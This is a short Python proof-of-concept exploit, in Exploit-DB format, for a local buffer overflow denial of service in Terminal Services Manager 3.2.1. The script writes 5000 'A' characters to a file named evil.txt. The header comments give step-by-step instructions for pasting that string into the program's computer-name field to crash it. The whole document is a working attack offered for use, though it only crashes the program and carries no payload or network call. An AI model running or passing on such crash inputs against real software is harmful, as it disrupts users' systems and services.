# -*- coding: utf-8 -*-# Exploit Title: Terminal Services Manager 3.2.1 - Local Buffer Overflow Denial of Service# Date: 22/05/2019# Author: Alejandra Sánchez# Vendor Homepage: https://lizardsystems.com# Software: https://lizardsystems.com/files/releases/terminal-services-manager/tsmanager_setup_3.2.1.247.exe# Version: 3.2.1 (Build 247)# Tested on: Windows 10# Steps to produce the crash:# 1.- Run the python script 'tsmanager.py', it will create a new file 'evil.txt'# 2.- Open Terminal Services Manager# 3.- Click 'Add computer'# 4.- Now paste the content of evil.txt into the field: 'Computer name or IP address' and click 'OK'# 5.- In the 'List' tab select the computer created.# 6.- Now in the 'Servers' tab double click on the created computer, wait and you will see a crash!
buffer = "\x41"* 5000
f = open ("evil.txt","w")
f.write(buffer)
f.close()
